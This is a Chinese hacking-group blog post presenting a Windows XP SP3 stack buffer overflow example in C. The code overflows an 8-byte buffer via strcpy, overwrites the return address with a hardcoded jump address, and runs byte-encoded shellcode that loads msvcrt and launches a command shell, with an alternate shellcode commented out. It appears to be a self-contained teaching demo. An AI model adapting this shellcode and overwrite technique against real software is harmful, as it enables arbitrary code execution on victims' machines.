注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[溢出]溢出exp例子 xp sp3 cmd shellcode  

2013-10-20 11:17:34|  分类: 缓冲区溢出 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

#include<stdio.h>
#include<string.h>

//char name[] = "k8team123456ghijk";  //6a696867 对应 jihg  堆栈先进后出 溢出位置

// k8team12  \0x6b\0x38\0x74\0x65\0x61\0x6d\0x31\0x32 8个字节
// 3456  \0x33\0x34\0x35\0x36
// hijk  \0x6a\0x69\0x68\0x67


char name[] =
    "\x6b\x38\x74\x65\x61\x6d\x31\x32"
    "\x33\x34\x35\x36"
    "\x67\x68\x69\x6a" //溢出位置  
    
    ;

 char shellcode[]=
    "\x6b\x38\x74\x65\x61\x6d\x31\x32"
    "\x33\x34\x35\x36"

    "\x12\x45\xfa\x7f" //xp sp3跳转地址
    
// cmd shellcode 106字节                
"\x55\x8B\xEC\x33\xC0\x50\x50\x50"
"\xC6\x45\xF4\x4D"
"\xC6\x45\xF5\x53"    
"\xC6\x45\xF6\x56"    
"\xC6\x45\xF7\x43"
"\xC6\x45\xF8\x52"
"\xC6\x45\xF9\x54"
"\xC6\x45\xFA\x2E"
"\xC6\x45\xFB\x44"
"\xC6\x45\xFC\x4C"
"\xC6\x45\xFD\x4C"
"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D"
"\x89\x45\xF4\xB8\x61\x6E\x64\x2E"    
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22"
"\x89\x45\xFC\x33\xD2\x88\x55\xFF"
"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
    
/*
//这个 shellcode 这样调用就不行啦
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
    "\x63\x6D\x64";
*/

int main()
{
char output[8];

//strcpy(output, name);

strcpy(output, shellcode);


//检测output里的值  以16进制打出
for(int i=0;i<8&&output[i];i++)
printf("\\0x%x",output[i]);


return 0;
}
  评论这张
 
阅读(1112)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016